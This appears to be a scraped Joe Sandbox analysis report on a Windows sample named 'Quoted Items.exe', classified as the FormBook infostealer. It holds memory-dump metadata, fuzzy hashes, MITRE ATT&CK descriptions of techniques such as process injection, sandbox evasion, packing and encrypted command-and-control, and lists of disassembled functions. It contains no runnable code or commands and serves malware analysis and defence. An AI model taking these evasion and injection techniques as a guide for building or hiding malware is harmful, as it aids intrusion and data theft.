RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0516FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0516FE01

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: bac6bce8fd681173f0631035ac24ffbe765c2f7702ca13f0ebbbfc3a3a4a79ca
Instruction ID: 352cf94694365940238fc19c82bf03232e4cef00eded22cebe0832e0afc8dfd6
Opcode Fuzzy Hash: bac6bce8fd681173f0631035ac24ffbe765c2f7702ca13f0ebbbfc3a3a4a79ca
Instruction Fuzzy Hash: 36F04636240201BFD6201A45EC06F27BF5BEB40730F154314F6284A5D1DB62F87092F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quoted Items.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quoted Items.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
Quoted Items.exe

Function 02D64360 Relevance: 2.2, Strings: 1, Instructions: 989
COMMON

Function 07835AD8 Relevance: 2.2, Strings: 1, Instructions: 956
COMMON

Function 0783EB10 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 02D6C3D0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 02D66BDE Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 02D657EC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 02D6E990 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 0783E7F8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0783E570 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Function 0783E918 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 0783E708 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Function 0783E490 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Function 02D6C618 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON